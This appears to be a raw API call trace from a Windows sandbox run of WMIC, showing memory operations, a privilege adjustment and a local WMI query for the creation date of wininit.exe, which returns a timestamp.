[0563.195] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x200101006e0009 | out: _String=0x0, _Context=0x200101006e0009) returned="from"
[0563.195] lstrlenW (lpString="FROM") returned 4
[0563.195] lstrlenW (lpString="from") returned 4
[0563.195] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2
[0563.195] malloc (_Size=0x18) returned 0x189660
[0563.195] free (_Block=0x189680)
[0563.195] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x200102006e0009 | out: _String=0x0, _Context=0x200102006e0009) returned="Win32_Process"
[0563.195] malloc (_Size=0x18) returned 0x189680
[0563.196] free (_Block=0x189660)
[0563.196] free (_Block=0x1886c0)
[0563.196] free (_Block=0x189680)
[0563.196] lstrlenW (lpString="SET") returned 3
[0563.196] lstrlenW (lpString="get") returned 3
[0563.196] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="SET", cchCount2=3) returned 1
[0563.196] lstrlenW (lpString="CREATE") returned 6
[0563.196] lstrlenW (lpString="get") returned 3
[0563.196] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="CREATE", cchCount2=6) returned 3
[0563.197] free (_Block=0x18cce0)
[0563.197] malloc (_Size=0x8) returned 0x18cce0
[0563.197] lstrlenW (lpString="GET") returned 3
[0563.197] lstrlenW (lpString="get") returned 3
[0563.197] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
[0563.197] free (_Block=0x1895a0)
[0563.197] malloc (_Size=0x18) returned 0x1895a0
[0563.198] free (_Block=0x189580)
[0563.198] malloc (_Size=0x18) returned 0x189580
[0563.199] ??0CHString@@QEAA@XZ () returned 0xaf7a8
[0563.199] malloc (_Size=0x18) returned 0x189680
[0563.199] malloc (_Size=0x20) returned 0x18ce80
[0563.199] memcpy_s (in: _Destination=0x18ce80, _DestinationSize=0x1e, _Source=0x31edc8, _SourceSize=0x14 | out: _Destination=0x18ce80) returned 0x0
[0563.199] lstrlenW (lpString="&") returned 1
[0563.199] lstrlenW (lpString="&amp;") returned 5
[0563.199] lstrlenW (lpString="<") returned 1
[0563.199] lstrlenW (lpString="&lt;") returned 4
[0563.199] lstrlenW (lpString=">") returned 1
[0563.199] lstrlenW (lpString="&gt;") returned 4
[0563.199] lstrlenW (lpString="'") returned 1
[0563.199] lstrlenW (lpString="&apos;") returned 6
[0563.199] lstrlenW (lpString="\"") returned 1
[0563.199] lstrlenW (lpString="&quot;") returned 6
[0563.199] malloc (_Size=0x18) returned 0x189660
[0563.200] free (_Block=0x189680)
[0563.200] free (_Block=0x18ce80)
[0563.200] ?Format@CHString@@QEAAXPEBGZZ () returned 0x18ce8c
[0563.200] malloc (_Size=0x18) returned 0x189680
[0563.201] malloc (_Size=0x18) returned 0x1896c0
[0563.201] SysStringLen (param_1="") returned 0x0
[0563.201] SysStringLen (param_1="") returned 0x1b
[0563.201] memcpy (in: _Dst=0x2fa038, _Src=0x2f1ca8, _Size=0x2 | out: _Dst=0x2fa038) returned 0x2fa038
[0563.201] memcpy (in: _Dst=0x2fa038, _Src=0x2f9f98, _Size=0x38 | out: _Dst=0x2fa038) returned 0x2fa038
[0563.201] free (_Block=0x189580)
[0563.201] free (_Block=0x189680)
[0563.201] free (_Block=0x189660)
[0563.201] ??1CHString@@QEAA@XZ () returned 0x303e1201
[0563.201] WbemLocator:IUnknown:AddRef (This=0x29cc20) returned 0x3
[0563.201] free (_Block=0x187fa0)
[0563.201] lstrlenW (lpString="") returned 0
[0563.202] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0563.202] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Q9IATRKPRH", cchCount1=10, lpString2="", cchCount2=0) returned 3
[0563.202] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0563.202] malloc (_Size=0x16) returned 0x189660
[0563.202] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0563.202] GetCurrentThreadId () returned 0x440
[0563.202] GetCurrentProcess () returned 0xffffffffffffffff
[0563.202] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0xaf620 | out: TokenHandle=0xaf620*=0x294) returned 1
[0563.202] GetTokenInformation (in: TokenHandle=0x294, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xaf618 | out: TokenInformation=0x0, ReturnLength=0xaf618) returned 0
[0563.202] malloc (_Size=0x40) returned 0x18ce80
[0563.202] GetTokenInformation (in: TokenHandle=0x294, TokenInformationClass=0x3, TokenInformation=0x18ce80, TokenInformationLength=0x40, ReturnLength=0xaf618 | out: TokenInformation=0x18ce80, ReturnLength=0xaf618) returned 1
[0563.202] AdjustTokenPrivileges (in: TokenHandle=0x294, DisableAllPrivileges=0, NewState=0x18ce80*(PrivilegesCount=0x5, Privileges=((Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=3, Attributes=0x19), (Luid.LowPart=0x2, Luid.HighPart=33, Attributes=0x0), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x64006e, Luid.HighPart=591270354, Attributes=0x2b29))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0563.203] free (_Block=0x18ce80)
[0563.203] CloseHandle (hObject=0x294) returned 1
[0563.203] lstrlenW (lpString="GET") returned 3
[0563.203] lstrlenW (lpString="get") returned 3
[0563.203] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
[0563.205] malloc (_Size=0x18) returned 0x189680
[0563.205] lstrlenA (lpString="") returned 0
[0563.205] malloc (_Size=0x2) returned 0x187fa0
[0563.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=-1, lpWideCharStr=0x187fa0, cchWideChar=1 | out: lpWideCharStr="") returned 1
[0563.205] free (_Block=0x187fa0)
[0563.205] malloc (_Size=0x18) returned 0x189580
[0563.205] lstrlenA (lpString="") returned 0
[0563.205] malloc (_Size=0x2) returned 0x187fa0
[0563.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=-1, lpWideCharStr=0x187fa0, cchWideChar=1 | out: lpWideCharStr="") returned 1
[0563.206] free (_Block=0x187fa0)
[0563.206] malloc (_Size=0x18) returned 0x189640
[0563.206] lstrlenA (lpString="") returned 0
[0563.206] malloc (_Size=0x2) returned 0x187fa0
[0563.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=-1, lpWideCharStr=0x187fa0, cchWideChar=1 | out: lpWideCharStr="") returned 1
[0563.206] free (_Block=0x187fa0)
[0563.206] malloc (_Size=0x18) returned 0x189760
[0563.206] lstrlenA (lpString="") returned 0
[0563.206] malloc (_Size=0x2) returned 0x187fa0
[0563.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=-1, lpWideCharStr=0x187fa0, cchWideChar=1 | out: lpWideCharStr="") returned 1
[0563.206] free (_Block=0x187fa0)
[0563.206] malloc (_Size=0x18) returned 0x1896e0
[0563.206] malloc (_Size=0x18) returned 0x189700
[0563.206] SysStringLen (param_1="") returned 0x0
[0563.206] SysStringLen (param_1="creationdate") returned 0xc
[0563.207] memcpy (in: _Dst=0x2fbd88, _Src=0x31edc8, _Size=0x2 | out: _Dst=0x2fbd88) returned 0x2fbd88
[0563.207] memcpy (in: _Dst=0x2fbd88, _Src=0x2f9f98, _Size=0x1a | out: _Dst=0x2fbd88) returned 0x2fbd88
[0563.207] free (_Block=0x189680)
[0563.207] free (_Block=0x1896e0)
[0563.207] lstrlenW (lpString="__CLASS") returned 7
[0563.207] lstrlenW (lpString="creationdate") returned 12
[0563.207] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__CLASS", cchCount2=7) returned 3
[0563.207] lstrlenW (lpString="__DERIVATION") returned 12
[0563.207] lstrlenW (lpString="creationdate") returned 12
[0563.207] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__DERIVATION", cchCount2=12) returned 3
[0563.207] lstrlenW (lpString="__DYNASTY") returned 9
[0563.207] lstrlenW (lpString="creationdate") returned 12
[0563.207] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__DYNASTY", cchCount2=9) returned 3
[0563.207] lstrlenW (lpString="__GENUS") returned 7
[0563.207] lstrlenW (lpString="creationdate") returned 12
[0563.207] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__GENUS", cchCount2=7) returned 3
[0563.207] lstrlenW (lpString="__NAMESPACE") returned 11
[0563.207] lstrlenW (lpString="creationdate") returned 12
[0563.208] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__NAMESPACE", cchCount2=11) returned 3
[0563.208] lstrlenW (lpString="__PATH") returned 6
[0563.208] lstrlenW (lpString="creationdate") returned 12
[0563.208] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__PATH", cchCount2=6) returned 3
[0563.208] lstrlenW (lpString="__PROPERTYCOUNT") returned 15
[0563.208] lstrlenW (lpString="creationdate") returned 12
[0563.208] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__PROPERTYCOUNT", cchCount2=15) returned 3
[0563.208] lstrlenW (lpString="__RELPATH") returned 9
[0563.208] lstrlenW (lpString="creationdate") returned 12
[0563.208] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__RELPATH", cchCount2=9) returned 3
[0563.208] lstrlenW (lpString="__SERVER") returned 8
[0563.208] lstrlenW (lpString="creationdate") returned 12
[0563.208] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__SERVER", cchCount2=8) returned 3
[0563.208] lstrlenW (lpString="__SUPERCLASS") returned 12
[0563.208] lstrlenW (lpString="creationdate") returned 12
[0563.208] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__SUPERCLASS", cchCount2=12) returned 3
[0563.209] lstrlenW (lpString="Select * from Win32_Process") returned 27
[0563.209] malloc (_Size=0x38) returned 0x1886c0
[0563.209] lstrlenW (lpString="Select * from Win32_Process") returned 27
[0563.209] wcstok (in: _String="Select * from Win32_Process", _Delimiter=" ", _Context=0xffffffffffffff80 | out: _String="Select", _Context=0xffffffffffffff80) returned="Select"
[0563.209] malloc (_Size=0x18) returned 0x1896e0
[0563.209] free (_Block=0x189580)
[0563.209] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x20010d006a0005 | out: _String=0x0, _Context=0x20010d006a0005) returned="*"
[0563.209] lstrlenW (lpString="FROM") returned 4
[0563.209] lstrlenW (lpString="*") returned 1
[0563.209] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1
[0563.209] malloc (_Size=0x18) returned 0x189580
[0563.209] free (_Block=0x1896e0)
[0563.209] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x20010e006a0005 | out: _String=0x0, _Context=0x20010e006a0005) returned="from"
[0563.210] lstrlenW (lpString="FROM") returned 4
[0563.210] lstrlenW (lpString="from") returned 4
[0563.210] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2
[0563.210] malloc (_Size=0x18) returned 0x1896e0
[0563.210] free (_Block=0x189580)
[0563.210] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x20010f006a0005 | out: _String=0x0, _Context=0x20010f006a0005) returned="Win32_Process"
[0563.210] malloc (_Size=0x18) returned 0x189580
[0563.210] free (_Block=0x1896e0)
[0563.211] free (_Block=0x1886c0)
[0563.211] malloc (_Size=0x18) returned 0x1896e0
[0563.211] lstrlenA (lpString=" FROM ") returned 6
[0563.211] malloc (_Size=0xe) returned 0x189680
[0563.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" FROM ", cbMultiByte=-1, lpWideCharStr=0x189680, cchWideChar=7 | out: lpWideCharStr=" FROM ") returned 7
[0563.211] free (_Block=0x189680)
[0563.211] malloc (_Size=0x18) returned 0x189680
[0563.211] lstrlenA (lpString="SELECT ") returned 7
[0563.211] malloc (_Size=0x10) returned 0x189720
[0563.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="SELECT ", cbMultiByte=-1, lpWideCharStr=0x189720, cchWideChar=8 | out: lpWideCharStr="SELECT ") returned 8
[0563.212] free (_Block=0x189720)
[0563.212] malloc (_Size=0x18) returned 0x189720
[0563.212] SysStringLen (param_1="SELECT ") returned 0x7
[0563.212] SysStringLen (param_1="creationdate") returned 0xc
[0563.212] memcpy (in: _Dst=0x2fbf08, _Src=0x2f9b58, _Size=0x10 | out: _Dst=0x2fbf08) returned 0x2fbf08
[0563.212] memcpy (in: _Dst=0x2fbf16, _Src=0x2fbd88, _Size=0x1a | out: _Dst=0x2fbf16) returned 0x2fbf16
[0563.212] malloc (_Size=0x18) returned 0x189740
[0563.212] SysStringLen (param_1="SELECT creationdate") returned 0x13
[0563.212] SysStringLen (param_1=" FROM ") returned 0x6
[0563.212] memcpy (in: _Dst=0x2fa3a8, _Src=0x2fbf08, _Size=0x28 | out: _Dst=0x2fa3a8) returned 0x2fa3a8
[0563.212] memcpy (in: _Dst=0x2fa3ce, _Src=0x31edc8, _Size=0xe | out: _Dst=0x2fa3ce) returned 0x2fa3ce
[0563.213] malloc (_Size=0x18) returned 0x189780
[0563.213] SysStringLen (param_1="SELECT creationdate FROM ") returned 0x19
[0563.213] SysStringLen (param_1="Win32_Process") returned 0xd
[0563.213] memcpy (in: _Dst=0x2d6ed8, _Src=0x2fa3a8, _Size=0x34 | out: _Dst=0x2d6ed8) returned 0x2d6ed8
[0563.213] memcpy (in: _Dst=0x2d6f0a, _Src=0x2f9f98, _Size=0x1c | out: _Dst=0x2d6f0a) returned 0x2d6f0a
[0563.213] free (_Block=0x189640)
[0563.213] free (_Block=0x189740)
[0563.213] free (_Block=0x189720)
[0563.213] free (_Block=0x189680)
[0563.239] free (_Block=0x1896e0)
[0563.239] malloc (_Size=0x18) returned 0x1896e0
[0563.239] malloc (_Size=0x18) returned 0x189680
[0563.239] lstrlenA (lpString=" WHERE ") returned 7
[0563.239] malloc (_Size=0x10) returned 0x189720
[0563.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" WHERE ", cbMultiByte=-1, lpWideCharStr=0x189720, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8
[0563.239] free (_Block=0x189720)
[0563.239] malloc (_Size=0x18) returned 0x189720
[0563.239] SysStringLen (param_1=" WHERE ") returned 0x7
[0563.239] SysStringLen (param_1="name=\"wininit.exe\"") returned 0x12
[0563.239] memcpy (in: _Dst=0x2fa3f8, _Src=0x31ee88, _Size=0x10 | out: _Dst=0x2fa3f8) returned 0x2fa3f8
[0563.239] memcpy (in: _Dst=0x2fa406, _Src=0x2fa3a8, _Size=0x26 | out: _Dst=0x2fa406) returned 0x2fa406
[0563.240] malloc (_Size=0x18) returned 0x189740
[0563.240] SysStringLen (param_1="SELECT creationdate FROM Win32_Process") returned 0x26
[0563.240] SysStringLen (param_1=" WHERE name=\"wininit.exe\"") returned 0x19
[0563.240] memcpy (in: _Dst=0x348718, _Src=0x2d6ed8, _Size=0x4e | out: _Dst=0x348718) returned 0x348718
[0563.240] memcpy (in: _Dst=0x348764, _Src=0x2fa3f8, _Size=0x34 | out: _Dst=0x348764) returned 0x348764
[0563.240] free (_Block=0x189780)
[0563.240] free (_Block=0x189720)
[0563.240] free (_Block=0x189680)
[0563.240] free (_Block=0x1896e0)
[0563.241] ??0CHString@@QEAA@XZ () returned 0xab4d0
[0563.241] GetCurrentThreadId () returned 0x440
[0563.241] CoCreateInstance (in: rclsid=0xffa673d0*(Data1=0x8d1c559d, Data2=0x84f0, Data3=0x4bb3, Data4=([0]=0xa7, [1]=0xd5, [2]=0x56, [3]=0xa7, [4]=0x43, [5]=0x5a, [6]=0x9b, [7]=0xa6)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffa673e0*(Data1=0xbfbf883a, Data2=0xcad7, Data3=0x11d3, Data4=([0]=0xa1, [1]=0x1b, [2]=0x0, [3]=0x10, [4]=0x5a, [5]=0x1f, [6]=0x51, [7]=0x5a)), ppv=0xffad29c0 | out: ppv=0xffad29c0*=0x2fc920) returned 0x0
[0563.255] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0563.255] ??0CHString@@QEAA@XZ () returned 0xab4d0
[0563.255] GetCurrentThreadId () returned 0x440
[0563.255] malloc (_Size=0x18) returned 0x1896e0
[0563.255] malloc (_Size=0x18) returned 0x189680
[0563.255] malloc (_Size=0x18) returned 0x189720
[0563.255] malloc (_Size=0x18) returned 0x189780
[0563.255] malloc (_Size=0x18) returned 0x189640
[0563.255] SysStringLen (param_1="\\\\") returned 0x2
[0563.256] SysStringLen (param_1="Q9IATRKPRH") returned 0xa
[0563.256] memcpy (in: _Dst=0x2fa3f8, _Src=0x31edc8, _Size=0x6 | out: _Dst=0x2fa3f8) returned 0x2fa3f8
[0563.256] memcpy (in: _Dst=0x2fa3fc, _Src=0x2f9b58, _Size=0x16 | out: _Dst=0x2fa3fc) returned 0x2fa3fc
[0563.256] malloc (_Size=0x18) returned 0x1897a0
[0563.256] SysStringLen (param_1="\\\\Q9IATRKPRH") returned 0xc
[0563.256] SysStringLen (param_1="\\") returned 0x1
[0563.256] memcpy (in: _Dst=0x2fbf08, _Src=0x2fa3f8, _Size=0x1a | out: _Dst=0x2fbf08) returned 0x2fbf08
[0563.256] memcpy (in: _Dst=0x2fbf20, _Src=0x2f1ca8, _Size=0x4 | out: _Dst=0x2fbf20) returned 0x2fbf20
[0563.256] malloc (_Size=0x18) returned 0x18ceb0
[0563.256] SysStringLen (param_1="\\\\Q9IATRKPRH\\") returned 0xd
[0563.256] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa
[0563.257] memcpy (in: _Dst=0x2fa3a8, _Src=0x2fbf08, _Size=0x1c | out: _Dst=0x2fa3a8) returned 0x2fa3a8
[0563.257] memcpy (in: _Dst=0x2fa3c2, _Src=0x31ee88, _Size=0x16 | out: _Dst=0x2fa3c2) returned 0x2fa3c2
[0563.257] free (_Block=0x1897a0)
[0563.257] free (_Block=0x189640)
[0563.257] free (_Block=0x189780)
[0563.257] free (_Block=0x189720)
[0563.257] free (_Block=0x189680)
[0563.257] free (_Block=0x1896e0)
[0563.257] malloc (_Size=0x18) returned 0x1896e0
[0563.258] malloc (_Size=0x18) returned 0x189680
[0563.258] malloc (_Size=0x18) returned 0x189720
[0563.258] WbemLocator:IWbemLocator:ConnectServer (in: This=0x29cc20, strNetworkResource="\\\\Q9IATRKPRH\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffad29d0 | out: ppNamespace=0xffad29d0*=0x308a30) returned 0x0
[0563.282] free (_Block=0x189720)
[0563.282] free (_Block=0x189680)
[0563.282] free (_Block=0x1896e0)
[0563.282] CoSetProxyBlanket (pProxy=0x308a30, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0
[0563.283] free (_Block=0x18ceb0)
[0563.283] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0563.283] ??0CHString@@QEAA@XZ () returned 0xab3e0
[0563.283] GetCurrentThreadId () returned 0x440
[0563.283] free (_Block=0x189760)
[0563.283] malloc (_Size=0x18) returned 0x189760
[0563.283] ??0CHString@@QEAA@XZ () returned 0xab390
[0563.283] GetCurrentThreadId () returned 0x440
[0563.284] CoCreateInstanceEx (in: Clsid=0xffa673b0*(Data1=0x674b6698, Data2=0xee92, Data3=0x11d0, Data4=([0]=0xad, [1]=0x71, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd8, [6]=0xfd, [7]=0xff)), punkOuter=0x0, dwClsCtx=0x1, pServerInfo=0x0, dwCount=0x1, pResults=0xab340 | out: pResults=((pIID=0xffa67380*(Data1=0x44aca674, Data2=0xe8fc, Data3=0x11d0, Data4=([0]=0xa0, [1]=0x7c, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pItf=0x2fcea0, hr=0x0))) returned 0x0
[0563.292] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0563.292] malloc (_Size=0x18) returned 0x1896e0
[0563.292] IWbemServices:ExecQuery (in: This=0x308a30, strQueryLanguage="WQL", strQuery="SELECT creationdate FROM Win32_Process WHERE name=\"wininit.exe\"", lFlags=48, pCtx=0x0, ppEnum=0xab3f0 | out: ppEnum=0xab3f0*=0x369870) returned 0x0
[0563.540] free (_Block=0x1896e0)
[0563.540] malloc (_Size=0x18) returned 0x1896e0
[0564.898] WbemContext:IWbemContext:SetValue (This=0x2fcea0, wszName="ExcludeSystemProperties", lFlags=0, pValue=0xab450*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0)) returned 0x0
[0564.898] free (_Block=0x1896e0)
[0564.898] CoSetProxyBlanket (pProxy=0x369870, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0
[0564.909] IEnumWbemClassObject:Next (in: This=0x369870, lTimeout=-1, uCount=0x1, apObjects=0xab3f8, puReturned=0xab410 | out: apObjects=0xab3f8*=0x2c11630, puReturned=0xab410*=0x1) returned 0x0
[0564.912] WbemObjectTextSrc:IWbemObjectTextSrc:GetText (in: This=0x2fc920, lFlags=0, pObj=0x2c11630, uObjTextFormat=0x1, pCtx=0x2fcea0, strText=0xab400 | out: strText=0xab400*="20240603113412.436800+120") returned 0x0
[0565.760] malloc (_Size=0x18) returned 0x1896e0
[0565.760] malloc (_Size=0x18) returned 0x189680
[0565.760] SysStringLen (param_1="") returned 0x5
[0565.760] SysStringLen (param_1="20240603113412.436800+120") returned 0x90
[0565.760] memcpy (in: _Dst=0x36c6a8, _Src=0x31edc8, _Size=0xc | out: _Dst=0x36c6a8) returned 0x36c6a8
[0565.760] memcpy (in: _Dst=0x36c6b2, _Src=0x36ba78, _Size=0x122 | out: _Dst=0x36c6b2) returned 0x36c6b2
[0565.760] free (_Block=0x189760)
[0565.761] free (_Block=0x1896e0)
[0565.761] IUnknown:Release (This=0x2c11630) returned 0x0
[0565.761] IEnumWbemClassObject:Next (in: This=0x369870, lTimeout=-1, uCount=0x1, apObjects=0xab3f8, puReturned=0xab410 | out: apObjects=0xab3f8*=0x0, puReturned=0xab410*=0x0) returned 0x1
[0565.763] malloc (_Size=0x18) returned 0x1896e0
[0565.763] malloc (_Size=0x18) returned 0x189760
[0565.763] SysStringLen (param_1="20240603113412.436800+120") returned 0x95
[0565.763] SysStringLen (param_1="") returned 0x6
[0565.763] memcpy (in: _Dst=0x36c7f8, _Src=0x36c6a8, _Size=0x12c | out: _Dst=0x36c7f8) returned 0x36c7f8
[0565.763] memcpy (in: _Dst=0x36c922, _Src=0x36c0e8, _Size=0xe | out: _Dst=0x36c922) returned 0x36c922
[0565.764] free (_Block=0x189680)
[0565.764] free (_Block=0x1896e0)
[0565.764] free (_Block=0x189760)
[0565.764] malloc (_Size=0x18) returned 0x189760
[0565.764] IUnknown:Release (This=0x369870) returned 0x0
[0565.767] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0565.767] free (_Block=0x189760)
[0565.767] free (_Block=0x189740)
[0565.767] free (_Block=0x189580)
[0565.767] free (_Block=0x189700)
[0565.768] malloc (_Size=0x18) returned 0x189700
[0565.768] malloc (_Size=0x18) returned 0x189580
[0565.768] SysStringLen (param_1="") returned 0x1b
[0565.768] SysStringLen (param_1="20240603113412.436800+120") returned 0x9b
[0565.768] memcpy (in: _Dst=0x36bcf8, _Src=0x2fa038, _Size=0x38 | out: _Dst=0x36bcf8) returned 0x36bcf8
[0565.768] memcpy (in: _Dst=0x36bd2e, _Src=0x36c7f8, _Size=0x138 | out: _Dst=0x36bd2e) returned 0x36bd2e
[0565.768] free (_Block=0x1896c0)
[0565.768] free (_Block=0x189700)
[0565.768] malloc (_Size=0x18) returned 0x189700
[0565.769] malloc (_Size=0x18) returned 0x1896c0
[0565.769] SysStringLen (param_1="20240603113412.436800+120") returned 0xb6
[0565.769] SysStringLen (param_1="") returned 0xa
[0565.769] memcpy (in: _Dst=0x36a108, _Src=0x36bcf8, _Size=0x16e | out: _Dst=0x36a108) returned 0x36a108
[0565.769] memcpy (in: _Dst=0x36a274, _Src=0x36c0e8, _Size=0x16 | out: _Dst=0x36a274) returned 0x36a274
[0565.769] free (_Block=0x189580)
[0565.769] free (_Block=0x189700)
[0565.769] ??0CHString@@QEAA@XZ () returned 0xaf680
[0565.769] malloc (_Size=0x18) returned 0x189700
[0565.769] malloc (_Size=0x20) returned 0x18ceb0
[0565.770] memcpy_s (in: _Destination=0x18ceb0, _DestinationSize=0x1e, _Source=0x36c0e8, _SourceSize=0x14 | out: _Destination=0x18ceb0) returned 0x0
[0565.770] lstrlenW (lpString="&") returned 1
[0565.770] lstrlenW (lpString="&amp;") returned 5
[0565.770] lstrlenW (lpString="<") returned 1
[0565.770] lstrlenW (lpString="&lt;") returned 4
[0565.770] lstrlenW (lpString=">") returned 1
[0565.770] lstrlenW (lpString="&gt;") returned 4
[0565.770] lstrlenW (lpString="'") returned 1
[0565.770] lstrlenW (lpString="&apos;") returned 6
[0565.770] lstrlenW (lpString="\"") returned 1
[0565.770] lstrlenW (lpString="&quot;") returned 6
[0565.770] malloc (_Size=0x18) returned 0x189580
[0565.770] free (_Block=0x189700)
[0565.771] free (_Block=0x18ceb0)
[0565.771] ?Format@CHString@@QEAAXPEBGZZ () returned 0x18d68c
[0565.771] malloc (_Size=0x18) returned 0x189700
[0565.772] free (_Block=0x1895a0)
[0565.772] free (_Block=0x189580)
[0565.772] ??1CHString@@QEAA@XZ () returned 0x303e1201
[0565.772] ??0CHString@@QEAA@XZ () returned 0xaf678
[0565.772] malloc (_Size=0x18) returned 0x189580
[0565.772] malloc (_Size=0x18) returned 0x1895a0
[0565.772] malloc (_Size=0x70) returned 0x18d680
[0565.772] memcpy_s (in: _Destination=0x18d680, _DestinationSize=0x6e, _Source=0x313818, _SourceSize=0x68 | out: _Destination=0x18d680) returned 0x0
[0565.772] lstrlenW (lpString="&") returned 1
[0565.772] lstrlenW (lpString="&amp;") returned 5
[0565.772] lstrlenW (lpString="<") returned 1
[0565.772] lstrlenW (lpString="&lt;") returned 4
[0565.772] lstrlenW (lpString=">") returned 1
[0565.772] lstrlenW (lpString="&gt;") returned 4
[0565.772] lstrlenW (lpString="'") returned 1
[0565.773] lstrlenW (lpString="&apos;") returned 6
[0565.773] lstrlenW (lpString="\"") returned 1
[0565.773] lstrlenW (lpString="&quot;") returned 6
[0565.773] malloc (_Size=0xa6) returned 0x18d700
[0565.773] memcpy_s (in: _Destination=0x18d700, _DestinationSize=0xa6, _Source=0x18d680, _SourceSize=0x68 | out: _Destination=0x18d700) returned 0x0
[0565.773] free (_Block=0x18d680)
[0565.773] memmove_s (in: _Destination=0x18d736, _DestinationSize=0x6e, _Source=0x18d72c, _SourceSize=0x3c | out: _Destination=0x18d736) returned 0x0
[0565.773] memcpy_s (in: _Destination=0x18d72a, _DestinationSize=0x7a, _Source=0xffa66098, _SourceSize=0xc | out: _Destination=0x18d72a) returned 0x0
[0565.773] memmove_s (in: _Destination=0x18d758, _DestinationSize=0x4c, _Source=0x18d74e, _SourceSize=0x24 | out: _Destination=0x18d758) returned 0x0
[0565.773] memcpy_s (in: _Destination=0x18d74c, _DestinationSize=0x58, _Source=0xffa66098, _SourceSize=0xc | out: _Destination=0x18d74c) returned 0x0
[0565.773] malloc (_Size=0x18) returned 0x189740
[0565.774] free (_Block=0x1895a0)
[0565.774] free (_Block=0x18d700)
[0565.774] ?Format@CHString@@QEAAXPEBGZZ () returned 0x18d68c
[0565.774] malloc (_Size=0x18) returned 0x1895a0
[0565.774] malloc (_Size=0x18) returned 0x189760
[0565.774] SysStringLen (param_1="") returned 0x9
[0565.774] SysStringLen (param_1=" PROCESS where name="wininit.exe" get creationdate ") returned 0x59
[0565.774] memcpy (in: _Dst=0x36a2a8, _Src=0x36c0e8, _Size=0x14 | out: _Dst=0x36a2a8) returned 0x36a2a8
[0565.774] memcpy (in: _Dst=0x36a2ba, _Src=0x2eef38, _Size=0xb4 | out: _Dst=0x36a2ba) returned 0x36a2ba
[0565.775] free (_Block=0x189580)
[0565.775] free (_Block=0x1895a0)
[0565.775] ??0CHString@@QEAA@XZ () returned 0xaf668
[0565.775] malloc (_Size=0x18) returned 0x1895a0
[0565.775] ??0CHString@@QEAA@XZ () returned 0xaf5f8
